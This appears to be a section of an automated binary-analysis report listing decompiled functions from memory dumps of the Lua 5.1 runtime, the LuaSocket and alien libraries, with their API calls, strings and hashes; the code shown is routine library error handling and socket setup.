0x00000000
0x00000000
0x00000000
0x00000000
0x100084c8
0x10008683
0x10008689
0x10008693
0x10008698
0x1000869d
0x100086a0
0x100086a3
0x100086aa
0x100086ac
0x100086c2
0x100086c7
0x100086ae
0x100086ae
0x100086b3
0x100086b6
0x100086b9
0x100086b9
0x100086ca
0x100086db
0x100086e7
0x100086ea

Strings

unfinished string, xrefs: 100084D4, 100084EC
escape sequence too large, xrefs: 1000865B

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: M_realloc_.
String ID: escape sequence too large$unfinished string
API String ID: 3188633865-2338411338
Opcode ID: 463b1214073882319d7ff953c37adcaf873fc1839e5d7bd7ab3dd376f20ca99c
Instruction ID: 93eebfcc4927af21eabaa5045a73637947e96ea5fd3cee99c244d377261ba276
Opcode Fuzzy Hash: 463b1214073882319d7ff953c37adcaf873fc1839e5d7bd7ab3dd376f20ca99c
Instruction Fuzzy Hash: AE81E574A04641DFE315CF14CC40D5AB7E5FF89384B248868E8C68B75AD736FA46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00992820, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00992820(intOrPtr* __eax, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v48;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr* _t20;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				intOrPtr* _t26;
				char* _t28;

				_t18 = _a4;
				_push(0);
				_push(2);
				_push(_t18);
				L00994B54();
				_t24 = _a8;
				_t28 =  &(( &_v48)[0xc]);
				_t26 = __eax;
				_t25 =  *_t24;
				while(_t25 != 0) {
					_t20 = _t26;
					while(1) {
						_t16 =  *_t20;
						_t22 = _t16;
						if(_t16 !=  *_t25) {
							break;
						}
						if(_t22 == 0) {
							L6:
							_t20 = 0;
						} else {
							_t17 =  *((intOrPtr*)(_t20 + 1));
							_t23 = _t17;
							if(_t17 !=  *((intOrPtr*)(_t25 + 1))) {
								break;
							} else {
								_t20 = _t20 + 2;
								_t25 = _t25 + 2;
								if(_t23 != 0) {
									continue;
								} else {
									goto L6;
								}
							}
						}
						L8:
						if(_t20 != 0) {
							goto L9;
						}
						goto L10;
					}
					asm("sbb ecx, ecx");
					asm("sbb ecx, 0xffffffff");
					goto L8;
					L9:
					_t25 =  *((intOrPtr*)(_t24 + 8));
					_t24 = _t24 + 8;
				}
				L10:
				if( *((intOrPtr*)(_t24 + 4)) == 0) {
					sprintf( &_v48, "unsupported option `%.35s\'", _t26);
					_push( &_v48);
					_push(2);
					_push(_t18);
					L00994B2A();
					_t28 =  &(_t28[0x18]);
				}
				return  *((intOrPtr*)(_t24 + 4))(_t18, _a12);
			}

0x00992824
0x0099282b
0x0099282d
0x0099282f
0x00992830
0x00992835
0x00992839
0x0099283c
0x0099283e
0x00992842
0x00992844
0x00992846
0x00992846
0x00992848
0x0099284c
0x00000000
0x00000000
0x00992850
0x00992866
0x00992866
0x00992852
0x00992852
0x00992855
0x0099285a
0x00000000
0x0099285c
0x0099285c
0x0099285f
0x00992864
0x00000000
0x00000000
0x00000000
0x00000000
0x00992864
0x0099285a
0x0099286f
0x00992871
0x00000000
0x00000000
0x00000000
0x00992871
0x0099286a
0x0099286c
0x00000000
0x00992873
0x00992873
0x00992876
0x00992879
0x0099287d
0x00992882
0x0099288f
0x00992899
0x0099289a
0x0099289c
0x0099289d
0x009928a2
0x009928a2
0x009928b8

APIs

luaL_checklstring.LUA5.1(?,00000002,00000000,?,?), ref: 00992830
sprintf.MSVCRT ref: 0099288F
luaL_argerror.LUA5.1(?,00000002,?), ref: 0099289D

Strings

unsupported option `%.35s', xrefs: 00992889

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_checklstring.sprintf
String ID: unsupported option `%.35s'
API String ID: 341491419-4085323626
Opcode ID: 06b2d044ed510abf262c2f5adfd834415d827e35c75e877496e480c870a9dbc5
Instruction ID: c1a92172ea8f75a93000e42857e2486a487cc5a851f9e650b6129f4ef1f40a2d
Opcode Fuzzy Hash: 06b2d044ed510abf262c2f5adfd834415d827e35c75e877496e480c870a9dbc5
Instruction Fuzzy Hash: 6A114C72A042517BCF249F2E8C82F7BBB5D9F95710F454A1CFDA957242E216EC0983A1

Uniqueness

Uniqueness Score: -1.00%

Function 00992090, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00992090(void* __ebx, void* __fp0, intOrPtr _a4) {
				char _v4;
				intOrPtr* _t9;
				intOrPtr _t22;
				intOrPtr* _t25;
				intOrPtr* _t26;
				void* _t35;

				_t35 = __fp0;
				_t9 = E00991790( &_v4, 1);
				_t25 = _t9;
				if(_t25 != 0) {
					_t22 = _a4;
					_push(_t22);
					L00994B4E();
					_push(_t25);
					_push(_t22);
					L00994AD0();
					return 2;
				} else {
					_push(0x2050);
					_push(_a4);
					L00994B6C();
					_t26 = _t9;
					E009912A0(_a4, "tcp{master}", 0xffffffff);
					E00994660( &_v4);
					_t5 = _t26 + 4; // 0x4
					 *_t26 = _v4;
					E009927D0(_t5, E00994410, E00994520, 0x9947c0, _t26);
					_push(0xbff00000);
					_t6 = _t26 + 0x2038; // 0x2038
					E00992CE0(_t6, 0, 0xbff00000, 0);
					E00992150(_t35, _t26 + 0x18, _t5, _t6);
					return 1;
				}
			}

0x00992090
0x0099209a
0x0099209f
0x009920a6
0x00992125
0x00992129
0x0099212a
0x0099212f
0x00992130
0x00992131
0x00992141
0x009920a8
0x009920ad
0x009920b2
0x009920b3
0x009920c0
0x009920c2
0x009920cc
0x009920db
0x009920e9
0x009920eb
0x009920f0
0x009920f7
0x00992105
0x00992113
0x00992124
0x00992124

APIs

lua_newuserdata.LUA5.1(?,00002050), ref: 009920B3

Part of subcall function 009912A0: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 009912B0
Part of subcall function 009912A0: lua_setmetatable.LUA5.1(?,?), ref: 009912C3

Part of subcall function 00994660: ioctlsocket.WSOCK32(?,8004667E,00000000), ref: 0099467A

lua_pushnil.LUA5.1(?), ref: 0099212A
lua_pushstring.LUA5.1(?,00000000,?), ref: 00992131

Strings

tcp{master}, xrefs: 009920BA

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: ioctlsocketlua_getfield.lua_newuserdata.lua_pushnil.lua_pushstring.lua_setmetatable.
String ID: tcp{master}
API String ID: 650809167-275915469
Opcode ID: e62932a1242a5121c2e40baa77517ff43dd407509211c8e7c710262a37bb2508
Instruction ID: 3055c8b8d4fe287f2d5778e99c4b90026738c37c9a2edf81c5aa4605f2aaa1b3
Opcode Fuzzy Hash: e62932a1242a5121c2e40baa77517ff43dd407509211c8e7c710262a37bb2508
Instruction Fuzzy Hash: AD012B7354531037CA21B7ACAC42F9F679CDFC5B68F14052CF64577282D664A90682F9

Uniqueness

Uniqueness Score: -1.00%

Function 00993EF0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00993EF0(intOrPtr _a4) {
				char _v4;
				intOrPtr* _t7;
				intOrPtr _t15;
				intOrPtr* _t17;

				_t7 = E00991790( &_v4, 2);
				_t17 = _t7;
				if(_t17 != 0) {
					_t15 = _a4;
					_push(_t15);
					L00994B4E();
					_push(_t17);
					_push(_t15);
					L00994AD0();
					return 2;
				} else {
					_push(0x20);
					_push(_a4);
					L00994B6C();
					E009912A0(_a4, "udp{unconnected}", 0xffffffff);
					E00994660( &_v4);
					_push(0xbff00000);
					 *_t7 = _v4;
					E00992CE0(_t7 + 8, 0, 0xbff00000, 0);
					return 1;
				}
			}

0x00993efa
0x00993eff
0x00993f06
0x00993f56
0x00993f5a
0x00993f5b
0x00993f60
0x00993f61
0x00993f62
0x00993f72
0x00993f08
0x00993f0c
0x00993f0e
0x00993f0f
0x00993f1e
0x00993f28
0x00993f31
0x00993f36
0x00993f45
0x00993f55
0x00993f55

APIs

lua_newuserdata.LUA5.1(?,00000020), ref: 00993F0F

Part of subcall function 009912A0: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 009912B0
Part of subcall function 009912A0: lua_setmetatable.LUA5.1(?,?), ref: 009912C3

Part of subcall function 00994660: ioctlsocket.WSOCK32(?,8004667E,00000000), ref: 0099467A

lua_pushnil.LUA5.1(?), ref: 00993F5B
lua_pushstring.LUA5.1(?,00000000,?), ref: 00993F62

Strings

udp{unconnected}, xrefs: 00993F16

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: ioctlsocketlua_getfield.lua_newuserdata.lua_pushnil.lua_pushstring.lua_setmetatable.
String ID: udp{unconnected}
API String ID: 650809167-754074627
Opcode ID: c69eb67db29c943c4d1d7d5b31f169bdc6c12ec30efb94b3ecd7be2059c5acdc
Instruction ID: a3253f6c1f4e32a3832f03e78814445acf6d397ba239c0ccebcf4c843855d475
Opcode Fuzzy Hash: c69eb67db29c943c4d1d7d5b31f169bdc6c12ec30efb94b3ecd7be2059c5acdc
Instruction Fuzzy Hash: ABF02873A4131137DA21BB6CAC02F6F6398DFD1771F14062CF5586B2C2D624E80683E9

Uniqueness

Uniqueness Score: -1.00%

Function 009C1950, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E009C1950(signed int _a4, intOrPtr* _a8) {
				intOrPtr _t12;
				void* _t13;
				intOrPtr _t15;
				intOrPtr _t19;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = _a8;
				_t13 = _t26 + 0x20c;
				if( *_t26 >= _t13) {
					_push(_t26);
					L009C210E();
					_t27 = _t27 + 4;
				}
				 *((char*)( *_t26)) = 0x3d;
				_t15 =  *_t26 + 1;
				 *_t26 = _t15;
				if(_t15 >= _t13) {
					_push(_t26);
					L009C210E();
					_t27 = _t27 + 4;
				}
				_t24 = _a4 & 0x000000ff;
				 *((char*)( *_t26)) =  *((intOrPtr*)((_t24 >> 4) + "0123456789ABCDEF"));
				_t19 =  *_t26 + 1;
				 *_t26 = _t19;
				if(_t19 >= _t13) {
					_push(_t26);
					L009C210E();
				}
				 *((char*)( *_t26)) =  *((intOrPtr*)((_t24 & 0x0000000f) + "0123456789ABCDEF"));
				_t12 =  *_t26 + 1;
				 *_t26 = _t12;
				return _t12;
			}

0x009c1952
0x009c1959
0x009c1961
0x009c1963
0x009c1964
0x009c1969
0x009c1969
0x009c196e
0x009c1973
0x009c1976
0x009c197a
0x009c197c
0x009c197d
0x009c1982
0x009c1982
0x009c198b
0x009c199c
0x009c19a0
0x009c19a3
0x009c19a7
0x009c19a9
0x009c19aa
0x009c19af
0x009c19be
0x009c19c2
0x009c19c3
0x009c19c7

APIs

luaL_prepbuffer.LUA5.1(?,009C183A,00000001,0000000A,009C18F1,?,00000001,00000000,00000001,?,00000000,009C183A,00000000,?,00000000,00000000), ref: 009C1964
luaL_prepbuffer.LUA5.1(?,009C183A,00000001,0000000A,009C18F1,?,00000001,00000000,00000001,?,00000000,009C183A,00000000,?,00000000,00000000), ref: 009C197D
luaL_prepbuffer.LUA5.1(?,009C183A,00000001,0000000A,009C18F1,?,00000001,00000000,00000001,?,00000000,009C183A,00000000,?,00000000,00000000), ref: 009C19AA

Strings

0123456789ABCDEF, xrefs: 009C19B7

Memory Dump Source

Source File: 00000003.00000002.486890418.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.486863680.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486943477.00000000009C3000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486972534.00000000009C4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487005169.00000000009C5000.00000002.00020000.sdmp Download File

Similarity

API ID: L_prepbuffer.
String ID: 0123456789ABCDEF
API String ID: 279711102-2554083253
Opcode ID: 7a3c1e4cf3c636897fb764032515cfd7fcc3b81ffc3675da35182f3cd8500e81
Instruction ID: 3b34564188133fad92f51e4414a43c29b0682fb28204bd95239bf9c8c2daa0fe
Opcode Fuzzy Hash: 7a3c1e4cf3c636897fb764032515cfd7fcc3b81ffc3675da35182f3cd8500e81
Instruction Fuzzy Hash: F801D8B2B092828FD726CF18E8D0955B7E5EF96300B28087DE1D6D7302D731A949CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 10014E10, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

luaL_error.LUA5.1(?,malformed pattern (missing ']'),?,?,10014C83,?,?,00000000,-00000001,00000000,?,10014A88), ref: 10014E40
luaL_error.LUA5.1(?,malformed pattern (ends with '%%'),?,10014C83,?,?,00000000,-00000001,00000000,?,10014A88,?,?,?,?,?), ref: 10014E73

Strings

malformed pattern (missing ']'), xrefs: 10014E3A
malformed pattern (ends with '%%'), xrefs: 10014E6A

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_error.
String ID: malformed pattern (ends with '%%')$malformed pattern (missing ']')
API String ID: 1455705698-2526682635
Opcode ID: edf3a205c664e841aaad7cb82b3f68a6153f88185ab6c804b7655390c7691617
Instruction ID: 0092f605991a77e152fe9e445d7a7a49fb1cdab8d8bb60338b920489da126632
Opcode Fuzzy Hash: edf3a205c664e841aaad7cb82b3f68a6153f88185ab6c804b7655390c7691617
Instruction Fuzzy Hash: 3701A2699085D26FD722CA14E840B86FBD4FB8A3A1F2A4C59E1C5CB421D774E8C2C794

Uniqueness

Uniqueness Score: -1.00%

Function 00A22E80, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00A22E80(intOrPtr _a4) {
				void* __ebx;
				void* __esi;
				void* _t3;
				intOrPtr* _t5;
				intOrPtr _t9;
				void* _t10;
				intOrPtr* _t11;
				intOrPtr _t12;
				void* _t13;
				void* _t14;

				_t12 = _a4;
				_t11 = E00A21110(_t3, 1, _t12, "alien_buffer");
				_t14 = _t13 + 4;
				if(_t11 == 0) {
					_push("alien buffer expected");
					_push(1);
					_push(_t12);
					L00A23F14();
					_t14 = _t14 + 0xc;
				}
				_t5 = _t11;
				_t2 = _t5 + 1; // 0x1
				_t10 = _t2;
				do {
					_t9 =  *_t5;
					_t5 = _t5 + 1;
				} while (_t9 != 0);
				_push(_t5 - _t10);
				_push(_t12);
				L00A23FD4();
				return 1;
			}

0x00a22e82
0x00a22e96
0x00a22e98
0x00a22e9d
0x00a22e9f
0x00a22ea4
0x00a22ea5
0x00a22ea6
0x00a22eab
0x00a22eab
0x00a22eae
0x00a22eb0
0x00a22eb0
0x00a22eb3
0x00a22eb3
0x00a22eb5
0x00a22eb8
0x00a22ebe
0x00a22ebf
0x00a22ec0
0x00a22ecd

APIs

Part of subcall function 00A21110: lua_touserdata.LUA5.1(?,00000001,?,00A22DF6,alien_buffer), ref: 00A21113
Part of subcall function 00A21110: lua_getmetatable.LUA5.1(?,00000001), ref: 00A21123
Part of subcall function 00A21110: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 00A2113A
Part of subcall function 00A21110: lua_rawequal.LUA5.1(?,000000FF,000000FE,?,FFFFD8F0,?), ref: 00A21144
Part of subcall function 00A21110: lua_settop.LUA5.1(?,000000FD), ref: 00A21153

luaL_argerror.LUA5.1(?,00000001,alien buffer expected), ref: 00A22EA6
lua_pushinteger.LUA5.1(?,-00000001), ref: 00A22EC0

Strings

alien_buffer, xrefs: 00A22E87
alien buffer expected, xrefs: 00A22E9F

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.lua_getfield.lua_getmetatable.lua_pushinteger.lua_rawequal.lua_settop.lua_touserdata.
String ID: alien buffer expected$alien_buffer
API String ID: 621180741-566560685
Opcode ID: 4ef581c8f0a2b4d04cb8e1183e90660ea6080eccf2cb1d6eb6ae6f70b72daa35
Instruction ID: 2bf342bb17dbf99a569cb15993e3aa7c705d2d8e2f03fb15398e8087a20c0453
Opcode Fuzzy Hash: 4ef581c8f0a2b4d04cb8e1183e90660ea6080eccf2cb1d6eb6ae6f70b72daa35
Instruction Fuzzy Hash: CFE09277B411343BE600222C7E42BAB679DAFC6360F194530FD449B301E5659E1443E1

Uniqueness

Uniqueness Score: -1.00%

Function 00A21170, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00A21170(void* __eax, void* __ecx) {
				void* __ebx;
				void* __esi;
				intOrPtr* _t3;
				void* _t4;
				void* _t8;

				_t8 = __eax;
				_t3 = E00A21110(__eax, __eax, __ecx, "alien_callback");
				if(_t3 == 0) {
					_t4 = E00A21110(_t3, _t8, __ecx, "alien_function");
					if(_t4 == 0) {
						_push("alien function or callback expected");
						_push(_t8);
						_push(__ecx);
						L00A23F14();
						return 0;
					} else {
						return  *((intOrPtr*)(_t4 + 4));
					}
				} else {
					return  *_t3;
				}
			}

0x00a21172
0x00a2117b
0x00a21185
0x00a21191
0x00a2119b
0x00a211a3
0x00a211a8
0x00a211a9
0x00a211aa
0x00a211b6
0x00a2119d
0x00a211a2
0x00a211a2
0x00a21187
0x00a2118b
0x00a2118b

Strings

alien_function, xrefs: 00A2118C
alien_callback, xrefs: 00A21176
alien function or callback expected, xrefs: 00A211A3

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_getfield.lua_getmetatable.lua_rawequal.lua_settop.lua_touserdata.
String ID: alien function or callback expected$alien_callback$alien_function
API String ID: 3502898327-3313075861
Opcode ID: 359c0779cea6ff31c29739b89b861c35205a8bd1431d2ba8946c4fdef309efc3
Instruction ID: 798fdeb074e93234394a228092fa2d913ca4e4169be124d9b50df4f2ce66af8b
Opcode Fuzzy Hash: 359c0779cea6ff31c29739b89b861c35205a8bd1431d2ba8946c4fdef309efc3
Instruction Fuzzy Hash: 04E080D7F411306FA64061BC7E83BD77398AA553957044975F604C7152F761DD2052E1

Uniqueness

Uniqueness Score: -1.00%

Function 100124E0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100124E0(void* __eflags, void* __fp0, intOrPtr _a4, signed int _a8) {
				intOrPtr _t12;

				_t16 = __eflags;
				_t10 = _a8;
				_t11 = _a4;
				E10001C30(__eflags, __fp0, _a4, 0xffffd8ef, _a8);
				_t12 =  *((intOrPtr*)(E10001810(_t16, _a4, 0xffffffff)));
				if(_t12 == 0) {
					E1000F230(_t11, "standard %s file is closed",  *((intOrPtr*)(0x100176d4 + _t10 * 4)));
				}
				return _t12;
			}

0x100124e0
0x100124e1
0x100124e7
0x100124f2
0x100124ff
0x10012506
0x10012516
0x1001251b
0x10012523

APIs

lua_rawgeti.LUA5.1(?,FFFFD8EF,?,?,?,?,100124CF,?,00000001,00000001), ref: 100124F2
lua_touserdata.LUA5.1(?,000000FF,?,FFFFD8EF,?,?,?,?,100124CF,?,00000001,00000001), ref: 100124FA
luaL_error.LUA5.1(?,standard %s file is closed,00000000), ref: 10012516

Part of subcall function 1000F230: luaL_where.LUA5.1(?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F238
Part of subcall function 1000F230: lua_pushvfstring.LUA5.1(?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F248
Part of subcall function 1000F230: lua_concat.LUA5.1(?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F250
Part of subcall function 1000F230: lua_error.LUA5.1(?,?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F256

Strings

standard %s file is closed, xrefs: 10012510

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_error.L_where.lua_concat.lua_error.lua_pushvfstring.lua_rawgeti.lua_touserdata.
String ID: standard %s file is closed
API String ID: 1747102811-758085179
Opcode ID: a47756bd5cee5d26957965073c08bb187b986d77988fcfae4abd1aff57977344
Instruction ID: 92794747bf155d51766a022156f3fd6684a2f2f7d909131cb668392ac45e6065
Opcode Fuzzy Hash: a47756bd5cee5d26957965073c08bb187b986d77988fcfae4abd1aff57977344
Instruction Fuzzy Hash: 09E0DFA66000203B9100D6CC9CC0C7B73ACDB866B0B044228FA14A7256C630ED2267F1

Uniqueness

Uniqueness Score: -1.00%

Function 00A21430, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00A21430(intOrPtr* __eax, intOrPtr _a4) {
				void* __edi;
				intOrPtr _t5;

				_t5 = _a4;
				_push(1);
				_push(_t5);
				L00A23F50();
				if(__eax == 0) {
					_push("alien: not an userdata");
					_push(_t5);
					L00A23F26();
					return 0;
				} else {
					_push(1);
					_push(_t5);
					L00A23F0E();
					return E00A21290(__eax, _t5, 0, __eax, 0);
				}
			}

0x00a21431
0x00a21435
0x00a21437
0x00a21438
0x00a21442
0x00a2145b
0x00a21460
0x00a21461
0x00a2146c
0x00a21444
0x00a21444
0x00a21446
0x00a21447
0x00a2145a
0x00a2145a

APIs

lua_isuserdata.LUA5.1(?,00000001), ref: 00A21438
lua_touserdata.LUA5.1(?,00000001), ref: 00A21447

Part of subcall function 00A21290: lua_newuserdata.LUA5.1(?,00000038,?,00A23D3C,00000000,?,00000000), ref: 00A21294
Part of subcall function 00A21290: lua_getfield.LUA5.1(?,FFFFD8F0,alien_function), ref: 00A212AD
Part of subcall function 00A21290: lua_setmetatable.LUA5.1(?,000000FE,?,FFFFD8F0,alien_function), ref: 00A212B5

luaL_error.LUA5.1(?,alien: not an userdata), ref: 00A21461

Strings

alien: not an userdata, xrefs: 00A2145B

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: L_error.lua_getfield.lua_isuserdata.lua_newuserdata.lua_setmetatable.lua_touserdata.
String ID: alien: not an userdata
API String ID: 3925326714-1813700245
Opcode ID: 6e66dc921385a0e06602ae50eafc73ca5d61b38d0f05645a60da0284254f1613
Instruction ID: 6576c3ff22db7e7fe90bc908dd0bc407e487838ab25bdbaaa1458f1abe5165b3
Opcode Fuzzy Hash: 6e66dc921385a0e06602ae50eafc73ca5d61b38d0f05645a60da0284254f1613
Instruction Fuzzy Hash: 00D01293E9822171E950726C7F43F7E117A0BE2F11F544434FA08A91C6F59596415072

Uniqueness

Uniqueness Score: -1.00%

Function 10013670, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 15%

			E10013670(intOrPtr _a4) {
				char* _t4;
				void* _t9;
				char* _t12;
				char* _t13;

				_t4 = tmpnam(_t12);
				_t13 =  &(_t12[4]);
				if(_t4 != 0) {
					E10001980(_t9, _a4, _t13);
					return 1;
				} else {
					_push("unable to generate a unique filename");
					_push(_a4);
					return E1000F230();
				}
			}

0x10013678
0x1001367e
0x10013683
0x100136a5
0x100136b5
0x10013685
0x10013689
0x1001368e
0x1001369a
0x1001369a

APIs

tmpnam.MSVCRT ref: 10013678
luaL_error.LUA5.1(?,unable to generate a unique filename), ref: 1001368F

Part of subcall function 1000F230: luaL_where.LUA5.1(?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F238
Part of subcall function 1000F230: lua_pushvfstring.LUA5.1(?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F248
Part of subcall function 1000F230: lua_concat.LUA5.1(?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F250
Part of subcall function 1000F230: lua_error.LUA5.1(?,?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F256

lua_pushstring.LUA5.1(?), ref: 100136A5

Strings

unable to generate a unique filename, xrefs: 10013689

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_error.L_where.lua_concat.lua_error.lua_pushstring.lua_pushvfstring.tmpnam
String ID: unable to generate a unique filename
API String ID: 3865537989-1457574477
Opcode ID: cfdd6caf2f334ae9c857d5b20d415b50ea245c5b806b89cfa5284dc14dd977ac
Instruction ID: 4e9f64205a8e20b3be9c476eae78073551fc29bdad022eb7dd008a37283bf7e1
Opcode Fuzzy Hash: cfdd6caf2f334ae9c857d5b20d415b50ea245c5b806b89cfa5284dc14dd977ac
Instruction Fuzzy Hash: 71E086F9D0024167E700EB689D4696B73A8FBD0248FC88C58F94886203F635D65C4763

Uniqueness

Uniqueness Score: -1.00%

Function 10016560, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E10016560(void* __eflags, intOrPtr _a4, intOrPtr _a8) {

				_t12 = __eflags;
				_t7 = _a4;
				_push(E100016F0(__eflags, _a4, 0xffffffff, 0));
				_push(_a8);
				return E1000F230(_t7, "error loading module \'%s\' from file \'%s\':\n\t%s", E100016F0(_t12, _t7, 1, 0));
			}

0x10016560
0x10016561
0x10016572
0x10016577
0x10016595

APIs

lua_tolstring.LUA5.1(?,000000FF,00000000,?,100163DA,?,00000000), ref: 1001656A
lua_tolstring.LUA5.1(?,00000001,00000000,?,00000000,100163DA,?,00000000), ref: 1001657D
